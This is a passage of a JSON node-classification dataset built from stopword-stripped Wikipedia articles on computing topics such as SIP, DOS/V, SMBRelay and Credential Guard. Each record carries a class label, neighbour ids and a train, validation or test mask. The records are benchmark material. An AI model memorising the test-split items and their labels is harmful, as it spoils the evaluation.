performance tester software used simulate sip rtp traffic see server ip network stable call load software measures performance indicators like answer delay answer/seizure ratio rtp jitter packet loss round-trip delay time sip connection marketing term voice internet protocol voip services offered many internet telephony service providers itsps service provides routing telephone calls client private branch exchange pbx telephone system public switched telephone network pstn services may simplify corporate information system infrastructure sharing internet access voice data removing cost basic rate interface bri primary rate interface pri telephone circuits sip trunking similar marketing term preferred service used simplify telecom infrastructure sharing carrier access circuit voice data internet traffic removing need primary rate interface pri circuits sip-enabled video surveillance cameras initiate calls alert operator events motion objects protected area sip used audio ip broadcasting applications provides interoperable means audio interfaces different manufacturers make connections one another u.s. national institute standards technology nist advanced networking technologies division provides public-domain java implementation serves reference implementation standard implementation work proxy server user agent scenarios used numerous commercial research projects supports full number extension rfcs including event notification reliable provisional responses numerous commercial open-source sip implementations exist see list sip software sip-i session initiation protocol encapsulated isup protocol used create modify terminate communication sessions based isup using sip ip networks services using sip-i include voice video telephony fax data sip-i sip-t two protocols similar features notably allow isup messages transported sip networks preserves detail available isup header important many country-specific variants isup implemented last 30 years always possible express detail using native sip message sip-i defined itu-t whereas sip-t defined via ietf rfc route concerns security calls via public internet addressed encryption sip protocol secure transmission uri scheme sips used mandate hop request forwarded target domain must secured transport layer security tls last hop proxy target domain user agent secured according local policies tls protects attackers try listen signaling link provide end-to-end security prevent espionage law enforcement interception encryption hop-by-hop every single intermediate proxy trusted end-to-end security may also achieved secure tunneling ipsec service providers offer secure connections use tls securing signaling tls connections use uris form nowiki sips user example.com /nowiki media streams separate connections signaling stream may encrypted secure real-time transport protocol srtp key exchange srtp performed sdes zrtp one may also add mikey exchange sip determine session keys use srtp",
    "neighbors": [
      0,
      7681,
      10242,
      1030,
      1036,
      14,
      527,
      8211,
      2072,
      6681,
      3610,
      5659,
      6682,
      7705,
      10269,
      10270,
      3105,
      6177,
      6689,
      9251,
      2085,
      7208,
      5677,
      7214,
      8238,
      562,
      1586,
      9269,
      8758,
      11321,
      1083,
      3133,
      5181,
      6208,
      6723,
      11332,
      8265,
      9292,
      4687,
      4186,
      5211,
      8285,
      10341,
      614,
      2150,
      10344,
      10349,
      3695,
      4723,
      2679,
      4729,
      3198,
      5251,
      6275,
      7812,
      9860,
      649,
      4746,
      9868,
      8335,
      11408,
      3218,
      9365,
      11413,
      152,
      10393,
      10907,
      3228,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      6825,
      1195,
      172,
      10924,
      6318,
      7857,
      10932,
      9909,
      4793,
      7865,
      4797,
      702,
      1218,
      8386,
      7364,
      6855,
      2760,
      4297,
      1738,
      8905,
      10444,
      1229,
      3792,
      5843,
      3284,
      6364,
      10461,
      4318,
      7391,
      6880,
      3297,
      3812,
      2797,
      751,
      7407,
      8432,
      8946,
      755,
      5875,
      8437,
      10996,
      7928,
      3322,
      7426,
      9987,
      5892,
      5382,
      3847,
      9478,
      1297,
      2833,
      10005,
      5402,
      5405,
      10020,
      6951,
      9511,
      9519,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      5440,
      2373,
      6982,
      2887,
      2376,
      10058,
      2892,
      849,
      6993,
      1876,
      5972,
      6996,
      6997,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      9572,
      1893,
      871,
      11112,
      361,
      367,
      5492,
      3959,
      891,
      6524,
      3966,
      2431,
      11647,
      10115,
      3460,
      6541,
      7570,
      1942,
      5531,
      1437,
      10144,
      10659,
      933,
      2983,
      6567,
      1962,
      9131,
      6577,
      2996,
      5561,
      1467,
      10171,
      3006,
      6590,
      9670,
      5576,
      11210,
      2509,
      8669,
      8670,
      10723,
      4068,
      6628,
      10727,
      3564,
      8685,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10272,
    "label": 3,
    "text": "Enterprise_Storage_OS:enterprise storage os enterprise storage os also known esos linux distribution serves block-level storage server storage area network san esos composed open-source software projects required linux distribution several proprietary build install time options scst project core component esos provides back-end storage functionality esos niche linux distribution esos intended run usb flash drive type removable media secure digital compactflash etc esos memory resident operating system boot tmpfs file system initialized root file system usb flash drive image copied onto file system configuration files logs periodically written usb flash drive persistent storage user intervention configuration changes occur esos utilizes text-based user interface tui system management network configuration storage provisioning functions tui used esos written c ncurses cdk libraries used esos supports connectivity several different front-end storage area network technologies core functions supported scst third-party target drivers vendors developed scst open-source software projects commodity computing server hardware used back-end side provide underlying storage utilized front-end target interfaces esos differs popular linux distributions bootable iso image provided esos consists one archive file extracted local computer running supported operating system linux windows mac os x local computer used installing esos image usb flash drive removable media device users esos extract archive execute esos install script esos installer script prompts user installation target device writes image allow users integrate proprietary cli raid controller utilities esos usb flash drive january 16 2019 commit bfb8c55 license esos project changed gnu general public license gpl apache license version 2.0",
    "neighbors": [
      7907,
      8772,
      935,
      5384,
      10382,
      7983,
      246,
      7863,
      1049,
      2045,
      3582,
      10111
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10273,
    "label": 3,
    "text": "DOS/V:dos/v dos/v japanese computing initiative starting 1990 allow dos ibm pc compatibles vga cards handle double-byte dbcs japanese text via software alone developed ibm ps/55 machines localized version ps/2 kanji fonts locale information stored hard disk rather special chips preceding ax architecture ax great value japanese computing industry allowing compatibility foreign software possible nec proprietary pc-98 system market leader dos/v emerged dos/v stands disk operating system/vga version 5 dos/v came approximately time dos 5 promotion dos/v done ibm consortium called pc open architecture developers group oadg digital research released japanese dos/v compatible version dr dos 6.0 1992 early 1980s ibm japan released two x86-based personal computer lines asian-pacific region ibm 5550 ibm jx 5550 read kanji fonts disk drew text graphic characters 1024×768 high resolution monitor jx extended ibm pcjr ibm pc architecture supported english japanese version pc dos 720×512 resolution monitor machines could n't break dominant nec pc-98 consumer market japan 5550 expensive mostly sold large enterprises used ibm mainframes jx used 8088 processor instead faster 8086 processor ibm thought consumer product jx must n't surpass business-class 5550 damaged buyer reputations whatever actual speed another point software company said ibm uncooperative developing jx softwares ibm japan planned 100 pc/xt compatible machine codenamed jx2 cancelled 1986 masahiko hatori developer jx dos 1987 started developing dos/v spare time ibm yamato development laboratory era toshiba released japanese version t3100 laptop microsoft introduced ax architecture months later ibm japan released ps/55 model 5535 proprietary laptop using special version dos hatori thought ibm need shift proprietary pc ibm pc compatibles bosses tsutomu maruyama nobuo mii thought japan closed pc market needed changed attempt could n't done ibm alone summer 1989 decided carry development dos/v disclose architecture ps/55 found pc open architecture developers group oadg dos/v development team designed dos/v simple better scalability compatibility original pc dos difficulty reducing text drawing time stopwatch necessity dos/v development hatori said first version dos/v introduced 11 october 1990 shipped november 1990 announcement letter said designed low-end desktops laptops ps/55 users reported bbs could run dos/v ibm pc clones development team confirmed comments modified incompatibilities dos/v secret inside company would prevent sales ps/55 meet opposition hatori said maruyama mii convince ibm branches agree plan beginning december 1990 maruyama went ibm management committee presented plan low-end pc strategy japan committee usual topic took 15 minutes topic took hour plan finally approved john akers committee microsoft japan got contract ibm japan receive source code dos/v 20 december 1990 ibm japan announced founded oadg microsoft would supply dos/v pc manufacturers 1992 1994 japanese manufacturers begun selling ibm pc clones dos/v global manufacturers entered japanese market compaq 1992 dell 1993 fujitsu released ibm pc clones fmv series october 1993 200,000 units shipped 1994 microsoft japan released first retail versions windows windows 3.1 dos/v pc-98 dos/v contributed dawn ibm pc clones japan yet pc-98 kept 50 market share 1996 changed release windows 95 pc dos versions dos/v j japanese p chinese prc taiwanese h korean ms-dos versions dos/v dr dos versions dos/v",
    "neighbors": [
      1408,
      8576,
      2179,
      1400,
      4996,
      6148,
      6787,
      10883,
      6797,
      7053,
      1148,
      3857,
      8976,
      9619,
      3477,
      11673,
      6557,
      5406,
      3359,
      8098,
      8355,
      6442,
      10999,
      11562,
      7983,
      9137,
      178,
      9139,
      6325,
      7483,
      573,
      321,
      10749,
      1219,
      964,
      6342,
      8262,
      2813,
      9033,
      2380,
      6476,
      9166,
      10960,
      4305,
      4051,
      477,
      863,
      5600,
      3938,
      5603,
      868,
      3429,
      5220,
      8423,
      9829,
      9194,
      6129,
      499,
      5363,
      1141,
      375,
      2168,
      3323,
      2172,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10274,
    "label": 5,
    "text": "Session_Announcement_Protocol:session announcement protocol session announcement protocol sap experimental protocol broadcasting multicast session information sap published ietf rfc 2974 sap typically uses session description protocol sdp format real-time transport protocol session descriptions announcement data sent using ip multicast user datagram protocol sap senders periodically broadcast sdp descriptions well-known multicast address port sap listening application listen sap multicasts construct guide advertised multicast sessions announcement interval cooperatively modulated sap announcements multicast delivery scope default consume 4000 bits per second regardless maximum announce interval 300 seconds 5 minutes announcements automatically expire 10 times announcement interval one hour whichever greater announcements may also explicitly withdrawn original issuer sap features separate methods authenticating encrypting announcements use encryption recommended authentication prevents unauthorized modification dos attacks authentication optional two authentication schemes supported message body may optionally compressed using zlib format defined rfc 1950 vlc media player monitors sap announcements presents user list available streams. /ref sap one optional discovery connection management techniques described aes67 audio-over-ethernet interoperability standard",
    "neighbors": [
      1411,
      9860,
      9734,
      3847,
      1297,
      11413,
      2206,
      9381,
      3629,
      7865,
      5433,
      8386,
      11332,
      6993,
      8283,
      1893,
      5875,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 10275,
    "label": 4,
    "text": "Boxbe:boxbe boxbe free service prioritizes screens spam personal email users select email want receive email goes spam presents challenge sender requires human response bulk anonymous data provided parent company provides email validation tracking service boxbe starts user allowing boxbe access user email contacts boxbe gives priority contacts users allow integration within gmail including google apps aol yahoo mail affiliates lets boxbe stay date screen email one way boxbe promotes service sending email addresses member guest list boxbe founded 2005 thede loder corbett barr venture capital firm draper fisher jurvetson esther dyson investors dyson steve jurvetson serving board members way filter spam beyond challenge response boxbe initially used option allowing recipients define price senders must risk deliver initial message paying fee deliver email called attention bond mechanism later abandoned boxbe company founder thede loder along marshall van alstyne rick wash wrote initial paper attention bond mechanism technically capable users assemble many functions whitelisting 2012 edatasource inc. purchased assets boxbe inc",
    "neighbors": [
      8224,
      1667,
      488,
      6762,
      1899,
      8202,
      8747,
      914,
      5012,
      1495
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10276,
    "label": 4,
    "text": "Zmanda_Recovery_Manager:zmanda recovery manager zmanda recovery manager perl-based utility used automate backup recovery mysql databases released gnu general public license zmanda recovery manager zrm mysql used mysql dbas backup recovery live mysql databases either local remote zrm uses appropriate backup method based particular storage engine used mysql particular storage infrastructure used e.g. use snapshots instant full backups lvm zfs netapp vxfs used zmanda offers three versions zrm mysql zrm enterprise edition zrm cluster edition zrm community edition enterprise edition includes graphical installer zmanda management console zmc command-line interface plugin framework community edition freely downloadable subset enterprise edition licensed gnu gplv2 supports lvm snapshots include zmc graphical installer zrm server runs windows solaris linux distributions including red hat ubuntu backing mysql databases solaris zrm able take benefit snapshot feature zfs zrm integrated",
    "neighbors": [
      5249,
      8582,
      6280,
      3988,
      1950,
      3366,
      6313,
      4398,
      9014,
      823,
      9025,
      4294,
      7764,
      7518,
      11492,
      2281,
      5737,
      8941,
      7022
    ],
    "mask": "None"
  },
  {
    "node_id": 10277,
    "label": 3,
    "text": "Calxeda:calxeda calxeda previously known smooth-stone company aimed provide computers based arm architecture server computers march 2011 calxeda announced 480-core server development consisting 120 quad-core arm cortex-a9 cpus calxeda claimed reduced energy consumption well better cost per throughput compared x86-based server manufacturers competed many-core server market intel amd recent arm-based server vendors marvell technology group armada xp product multi-core processor manufacturer tilera november 2011 calxeda announced energycore ecx-1000 featuring four 32-bit armv7 cortex-a9 cpu cores operating 1.1–1.4 ghz 32 kb l1 i-cache 32 kb l1 d-cache per core 4 mb shared l2 cache 1.5 w per processor 5 w per server node including 4 gb ddr3 dram 0.5 w idle chip included five 10 gigabit ethernet ports four chips carried energycard uk-headquartered company boston limited announced 2011 appliances based calxeda energycore system chip products boston appliances marketed viridis brand demonstrated november 2012 hewlett-packard used calxeda products server product known moonshot november 2011 named redstone rocket 19 december 2013 reported calxeda going restructuring widely referred shutting operation due running capital venture funding failing secure deal hewlett-packard december 2014 intellectual property developed calxeda re-emerged company called silver lining systems sls",
    "neighbors": [
      7745,
      5384,
      9964,
      7699,
      499,
      10675
    ],
    "mask": "None"
  },
  {
    "node_id": 10278,
    "label": 4,
    "text": "Nyotron:nyotron nyotron information-security company established 2009 brothers nir ofer gaist nir gaist cto sagit manor former executive verifone became ceo 2014 company based santa clara ca r office herzliya israel 2006 18-year-old nir gaist created original concept technology became nyotron flagship product paranoid 2007 ofer traveled bucharest romania develop prototype 2008 returned israel seeking support investors major general ret amos malka former director intelligence idf among first investors served nyotron first chairman board 2014 first official version paranoid shipped 2016 nyotron moved headquarters santa clara ca company launched global war room soc console 2017 began offering paranoid service managed detection response mdr service provided solution companies require protection advanced attackers unknown threats limited security staff 2018 nyotron signed distribution agreement ingram micro company published in-depth research report activities oilrig nation-state actor aka apt34 nyotron also joined anti-malware testing standards organization amtso paranoid anti-malware endpoint detection response edr technology grounded three realizations nyotron created map known good behavior operating system areas malicious activity would attempt access file systems process thread management networking registry partition modification approach called os-centric positive security automatic os behavior whitelisting language used describing “ maps ” called behavior patterns mapping bpm patented language require machine learning/artificial intelligence statistical math-based algorithm instead deterministic algorithm complexity 1 means performance n't degrade volume input os-centric positive security approach focuses “ good ” behavior operating system paranoid detects blocks known unknown malware including zero-day exploits company calls “ threat-agnostic defense ” addition protection paranoid provides visibility attack timelines root cause attacker methods ttps 2015 company raised 10 million mivtach shamir holdings investors 2017 21 million raised douglas sandra bergeron founders dgb investments investors 2018 ingram micro made strategic investment 10 million july 2017 paranoid part sc magazine endpoint security group test received 5 5 stars publication stated “ perspective breadth depth analytical capability one best best displays type ever seen. ” september 2017 nyotron labeled “ vendor watch ” enterprise management associates nyotron also named top 50 cyber security leader 2017 cyber defense magazine 2018 paranoid named “ innovator endpoint security 2018 ” cyber defense september 2018 central station released review paranoid giving 4 possible 5 stars stating “ ransomware happening many companies product solution ransomware like virus transforms changing every day product really best solution security issue protecting end-point ransomware threat. ” october 2018 icsa labs released report stating nyotron paranoid icsa labs certified advanced threat defense report goes say nyotron detected 100 441 malicious samples tested 1 false positive 721 innocuous apps test february 2019 nyotron silver cybersecurity excellence awards categories innovative cybersecurity company advanced persistent threat protection",
    "neighbors": [
      9762,
      4423,
      5902,
      7983,
      1970,
      6516,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 10279,
    "label": 4,
    "text": "SMBRelay:smbrelay smbrelay smbrelay2 computer programs used carry smb man-in-the-middle mitm attacks windows machines written sir dystic cult dead cow cdc released march 21 2001 lantacon convention atlanta georgia seven years release microsoft released patch fixed hole exploited smbrelay fix fixes vulnerability smb reflected back client forwarded another host vulnerability still exploited smbrelay receives connection udp port 139 relays packets client server connecting windows machine originating computer port 139 modifies packets necessary connecting authenticating target client disconnected smbrelay binds port 139 new ip address relay address connected directly using net use \\\\192.1.1.1 used networking functions built windows program relays smb traffic excluding negotiation authentication long target host remains connected user disconnect reconnect virtual ip smbrelay collects ntlm password hashes writes hashes.txt format usable l0phtcrack cracking later time port 139 privileged port requires administrator access use smbrelay must run administrator access account however since port 139 needed netbios sessions difficult block according sir dystic problem marketing standpoint microsoft wants products much backward compatibility possible continuing use protocols known issues continue leave customers risk exploitation ... yet known issues existed since day one protocol bug fundamental design flaw assume nobody used method exploit people silly took less two weeks write smbrelay smbrelay2 works netbios level across protocol netbios bound nbf nbt differs smbrelay uses netbios names rather ip addresses smbrelay2 also supports man-in-the-middling third host however supports listening one name time",
    "neighbors": [
      10914,
      1187,
      8135,
      4552,
      6797,
      10640,
      5111,
      11413,
      2007,
      8827,
      1501,
      9214,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10280,
    "label": 2,
    "text": "IBM_Systems_Application_Architecture:ibm systems application architecture systems application architecture saa introduced 1987 set standards computer software developed ibm saa initiative started 1987 leadership earl wheeler father saa intent implement saa ibm operating systems including mvs os/400 os/2 aix ibm version unix operating system target saa interoperability saa family saa define new standards selected among ibm existing guidelines software ibm also purchased third party software developers bachman information systems index technology inc. knowledgeware inc intended implemented uniformly across saa compliant environments standard designed make application programs look work manner across entire range company personal computing systems midrange processors system/370 processors saa labeled complex obscure potentially difficult learn lou gerstner ibm later quietly discontinued use saa umbrella 2001 saa spoken past tense however many individual components saa still use common programming interface attempted standardize compilers application programming interfaces among systems participating saa objective providing common programming interface entire ibm computer product line pcs system/3x system/370 implies saa program written ibm machine run cpi included number pieces common user access aimed providing common user interface entire ibm product line user sits pc see menus keyboards procedures would 3270 terminal hardware differences complete commonality impossible attain ibm created two cua standards basic interface ibm 3270 ibm 5250 terminals advanced interface so-called intelligent workstations pcs keyboard standardized model 101 key enhanced keyboard layout common communications services defined methods heterogeneous systems communicated ccs depended advanced program-to-program communications also known appc lu6.2 systems network architecture sna pu2.1 low entry networking peer peer networking sna management services network control three types data links supported application services provided officevision saa-compliant successor profs as/400 office office automation ad/cycle family development tools intended simplify development saa applications",
    "neighbors": [
      1184,
      1760,
      4546,
      10438,
      2089,
      909,
      7053,
      7983,
      6544,
      10289,
      8628,
      8502,
      2775,
      3960,
      11450,
      3323,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10281,
    "label": 2,
    "text": "Credential_Guard:credential guard credential guard virtualization-based isolation technology lsass prevents attackers stealing credentials could used pass hash attacks credential guard introduced microsoft windows 10 operating system windows 10 version 20h1 credential guard available enterprise edition operating system compromising system attackers often attempt extract stored credentials lateral movement network prime target lsass process stores ntlm kerberos credentials credential guard prevents attackers dumping credentials stored lsass running lsass virtualized container even user system privileges access system creates proxy process called lsaiso lsa isolated communication virtualized lsass process several generic techniques stealing credentials systems credential guard",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      2101,
      10812,
      3648,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      4552,
      969,
      6088,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 10282,
    "label": 2,
    "text": "DirectX_Media:directx media directx media set multimedia-related apis microsoft windows complementing directx included directanimation 2d/3d web animation directshow multimedia playback streaming media directx transform web interactivity direct3d retained mode higher level 3d graphics directshow additionally contained directx plugins audio signal processing directx video acceleration accelerated video playback directx media runtime components distributed part internet explorer directx media sdk directx sdk existed two separate sdks directx 6.0 later microsoft deprecated directx media integrated directshow key part directx media directx april 2005 directshow removed directx moved microsoft platform sdk instead directx however still required build directshow samples directshow components gradually deprecated favor newer media foundation retained mode used variety applications still implemented systems newer xp copying d3drm.dll file older version windows system32 directory 32 bit windows syswow64 directory 64 bit windows regain system-wide support",
    "neighbors": [
      5765,
      9609,
      6028,
      6797,
      6927,
      790,
      6171,
      10270,
      7713,
      11683,
      10026,
      11060,
      11316,
      10808,
      9167,
      9808,
      3413,
      11223,
      8281,
      2777,
      603,
      4321,
      5225,
      1770,
      9328,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 10283,
    "label": 4,
    "text": "Network_behavior_anomaly_detection:network behavior anomaly detection network behavior anomaly detection nbad provides one approach network security threat detection complementary technology systems detect security threats based packet signatures nbad continuous monitoring network unusual events trends nbad integral part network behavior analysis nba offers security addition provided traditional anti-threat applications firewalls intrusion detection systems antivirus software spyware-detection software security monitoring systems utilize signature-based approach detect threats generally monitor packets network look patterns packets match database signatures representing pre-identified known security threats nbad-based systems particularly helpful detecting security threat vectors 2 instances signature-based systems new zero-day attacks ii threat traffic encrypted command control channel certain botnets nbad program tracks critical network characteristics real time generates alarm strange event trend detected could indicate presence threat large-scale examples characteristics include traffic volume bandwidth use protocol use nbad solutions also monitor behavior individual network subscribers order nbad optimally effective baseline normal network user behavior must established period time certain parameters defined normal departure one flagged anomalous nbad used addition conventional firewalls applications detection malware vendors begun recognize fact including nba/nbad programs integral parts network security packages nbad technology/techniques applied number network security monitoring domains including log analysis ii packet inspection systems iii flow monitoring systems iv route analytics",
    "neighbors": [
      704,
      9569,
      9413,
      8998,
      3433,
      939,
      10924,
      10417,
      6834,
      7411,
      7515,
      11413,
      2328,
      793,
      3323,
      156,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 10284,
    "label": 4,
    "text": "Google_Native_Client:google native client google native client nacl sandboxing technology running either subset intel x86 arm mips native code portable executable sandbox allows safely running native code web browser independent user operating system allowing web apps run near-native speeds aligns google plans chrome os may also used securing browser plugins parts applications full applications zerovm demonstrate readiness technology 9 december 2011 google announced availability several new chrome-only versions games known rich processor-intensive graphics including bastion longer supported chrome web store nacl runs hardware-accelerated 3d graphics via opengl es 2.0 sandboxed local file storage dynamic loading full screen mode mouse capture also plans make nacl available handheld devices portable native client pnacl architecture-independent version pnacl apps compiled ahead-of-time pnacl recommended nacl use cases general concept nacl running native code web browser implemented activex still use full access system disk memory user-interface registry etc. native client avoids issue using sandboxing alternative sorts nacl asm.js also allows applications written c c++ compiled run browser half native speed also supports ahead-of-time compilation subset javascript hence backwards-compatible browsers support directly another alternative may initially powered pnacl webassembly october 12 2016 comment chromium issue tracker indicated google pepper native client teams destaffed may 30 2017 google announced deprecation pnacl favor webassembly although initially google planned remove pnacl first quarter 2018 removal currently planned second quarter 2019 except chrome apps native client open-source project developed google date quake xaos battle wesnoth doom lara croft guardian light dust mame well sound processing system csound ported native client native client available google chrome web browser since version 14 enabled default since version 31 portable native client pnacl pronounced pinnacle released arm implementation released march 2010. x86-64 ia-32 mips also supported run application portably pnacl must compiled architecture-agnostic stable subset llvm intermediate representation bytecode executables called pnacl executables pexes pnacl toolchain makes .pexe files nacl toolchain .nexe files magic number .nexe files 0x7f e l f elf chrome translated architecture-specific executables run nacl uses software fault detection isolation sandboxing x86-64 arm x86-32 implementation native client notable novel sandboxing method makes use x86 architecture rarely used segmentation facility native client sets x86 segments restrict memory range sandboxed code access uses code verifier prevent use unsafe instructions perform system calls prevent code jumping unsafe instruction hidden middle safe instruction native client requires indirect jumps jumps start 32-byte-aligned blocks instructions allowed straddle blocks constraints c c++ code must recompiled run native client provides customized versions gnu toolchain specifically gnu compiler collection gcc gnu binutils llvm native client licensed bsd-style license native client uses newlib c library port gnu c library gnu libc also available nacl denotes sodium chloride common table salt pun name pepper also used pepper api cross-platform open-source api creating native client modules pepper plugin api ppapi cross-platform api native client-secured web browser plugins first based netscape npapi rewritten scratch currently used chromium google chrome enable ppapi version adobe flash built-in pdf viewer 12 august 2009 page google code introduced new project pepper associated pepper plugin api ppapi set modifications npapi make plugins portable secure extension designed specifically ease implementing out-of-process plugin execution goals project provide framework making plugins fully cross-platform topics considered include continuously evolving pepper api also supports gamepads version 19 websockets version 18 google open source browser chromium web browser use new browser plug-in model 2015 pepper supported chrome chromium blink layout engine-based browsers opera mozilla firefox stated 2014 would support pepper full specification api beyond implementation chrome designed use blink layout engine private apis specific flash player plugin documented october 2016 mozilla announced re-considered exploring whether incorporate pepper api pdfium future releases firefox however steps taken one website uses nacl server let users experiment go programming language browsers groups browser developers support native client technology others chad austin imvu praised way native client bring high-performance applications web 5 penalty compared native code secure way also accelerating evolution client-side applications giving choice programming language used besides javascript id software john d. carmack praised native client quakecon 2012 saying something inside browser native client much interesting something started really pretty darn clever x86 hack way could sandbox user mode interestingly dynamic recompilation something program c c++ compiles something going -o4 optimization level completely native code pretty damn close native code could evil pointer chasings whatever want to-the-metal game developer professionals critical sandboxing technology substantial substantive interoperability issues mozilla vice president products jay sullivan said mozilla plans run native code inside browser native apps little black boxes webpage ... really believe html want focus mozilla christopher blizzard criticized nacl claiming native code evolve way source code-driven web also compared nacl microsoft activex technology plagued dll hell håkon wium lie opera cto believes nacl seems 'yearning bad old days web native client building new platform – porting old platform web ... bring complexity security issues take away focus web platform second generation sandboxing developed google gvisor intended replace nacl google cloud exact google app engine",
    "neighbors": [
      4096,
      9229,
      8719,
      3600,
      1556,
      7700,
      9244,
      7212,
      10284,
      3633,
      4658,
      5697,
      7234,
      4683,
      5707,
      11343,
      3664,
      2138,
      8285,
      2658,
      7784,
      9320,
      9834,
      9841,
      10353,
      115,
      8821,
      124,
      7816,
      5262,
      7822,
      5264,
      6800,
      11408,
      4758,
      10393,
      6810,
      8858,
      7841,
      1203,
      4797,
      7359,
      196,
      3269,
      3782,
      11466,
      10445,
      3795,
      6868,
      1240,
      5849,
      8413,
      6366,
      6367,
      9949,
      11487,
      236,
      5356,
      9964,
      1776,
      9970,
      7926,
      3836,
      5380,
      5892,
      8455,
      1802,
      10506,
      8466,
      10009,
      10525,
      798,
      288,
      10020,
      4901,
      10026,
      7983,
      823,
      5431,
      2875,
      10045,
      11590,
      4423,
      11592,
      9039,
      3920,
      3409,
      10076,
      865,
      5483,
      4972,
      7548,
      1409,
      4995,
      2949,
      3462,
      9610,
      5522,
      1427,
      5524,
      10645,
      11154,
      1435,
      3484,
      2978,
      1959,
      3499,
      7595,
      7601,
      8627,
      2485,
      1468,
      8644,
      4044,
      10703,
      4048,
      5593,
      482,
      6632,
      5100,
      9712,
      8689,
      499,
      2045,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 10285,
    "label": 3,
    "text": "Computational_RAM:computational ram computational ram c-ram random-access memory processing elements integrated chip enables c-ram used simd computer also used efficiently use memory bandwidth within memory chip influential implementations computational ram came berkeley iram project vector iram v-iram combines dram vector processor integrated chip reconfigurable architecture dram radram dram reconfigurable computing fpga logic elements integrated chip simplescalar simulations show radram system conventional processor give orders magnitude better performance problems traditional dram system processor embarrassingly parallel computational problems already limited von neumann bottleneck cpu dram researchers expect total cost machine built computational ram run orders magnitude faster traditional general-purpose computer kinds problems 2011 dram process layers optimized high capacitance cpu process optimized high frequency typically twice many beol layers dram since additional layer reduces yield increases manufacturing cost chips relatively expensive per square millimeter compared dram distinct enough three approaches computational ram cpus designed built dram process technology rather cpu logic process technology specifically optimized cpus include berkeley iram project tomi technology dsp1 memory bus off-chip memory many times capacitance on-chip memory bus system separate dram cpu chips several times energy consumption iram system computer performance computational dram expected run hotter traditional dram increased chip temperatures result faster charge leakage dram storage cells computational dram expected require frequent dram refresh processor-in-/near-memory pinm refers computer processor cpu tightly coupled memory generally silicon chip chief goal merging processing memory components way reduce memory latency increase bandwidth alternatively reducing distance data needs moved reduces power requirements system much complexity hence power consumption current processors stems strategies deal avoiding memory stalls 1980s tiny cpu executed forth fabricated dram chip improve push pop forth stack-oriented programming language improved efficiency transputer also large chip memory given made early 1980s making essentially processor-in-memory notable pim projects include berkeley iram project iram university california berkeley project university notre dame pim effort",
    "neighbors": [
      1376,
      9126,
      2535,
      2383,
      1776,
      2623
    ],
    "mask": "Train"
  },
  {
    "node_id": 10286,
    "label": 1,
    "text": "List_of_relational_database_management_systems:list relational database management systems list relational database management systems",
    "neighbors": [
      6147,
      4614,
      5640,
      8201,
      4106,
      1549,
      2068,
      7191,
      3096,
      1049,
      5658,
      9248,
      10793,
      1579,
      3641,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      4696,
      1636,
      9828,
      5734,
      10340,
      8808,
      2669,
      1146,
      6780,
      3196,
      9360,
      10899,
      8340,
      10389,
      4255,
      9893,
      2727,
      4263,
      8871,
      10919,
      9389,
      10413,
      6831,
      9397,
      7868,
      6850,
      2246,
      2780,
      734,
      10471,
      3816,
      6383,
      5364,
      7412,
      5879,
      3323,
      9471,
      8969,
      7946,
      11530,
      270,
      10511,
      8979,
      7446,
      11030,
      5401,
      5403,
      11552,
      4901,
      2344,
      6451,
      1341,
      10048,
      2369,
      5953,
      3400,
      6479,
      2901,
      10069,
      8539,
      7523,
      7022,
      5999,
      9075,
      10632,
      4502,
      2456,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      5546,
      10681,
      3004,
      11203,
      974,
      9177,
      987,
      4065,
      3556,
      8683,
      6124,
      2544,
      10737,
      9205,
      4604,
      8189
    ],
    "mask": "None"
  },
  {
    "node_id": 10287,
    "label": 3,
    "text": "Galaxian:galaxian galaxian designed kazunori sawano worked many namco electro-mechanical shooting gallery games programmed kōichi tashiro namco set capitalize success taito space invaders massive impact video game market proving critical financial success although first video game galaxian popularized use rgb colorful enemy designs well use short jingles scrolling backgrounds one company first video games exported outside japan thanks licensing deal midway games galaxian proved critical commercial success upon release many applauding improvements invader -type games innovations 1982 sold 40,000 arcade units north america alone japan proved success pac-man followed long series sequels spin-offs multiple platforms — first galaga would usurp original popularity recognized one greatest video games time original ported numerous game consoles including atari 2600 msx family computer included multiple namco video game compilations cited one influential important video games shoot'em genre galaxian fixed shooter video game player controls starship called galaxip objective clear round aliens enemies appear formation towards top screen two escort ships labeled galaxian flagship galboss enemies make divebomb towards bottom screen shooting projectiles attempt hit player galaxip fire single shot on-screen must wait hit top able fire another due limitations hardware flagships make divebomb two red escort ships shooting three award player bonus points extra points awarded destruction flagship enemy movement increase game progresses alongside number shots enemies 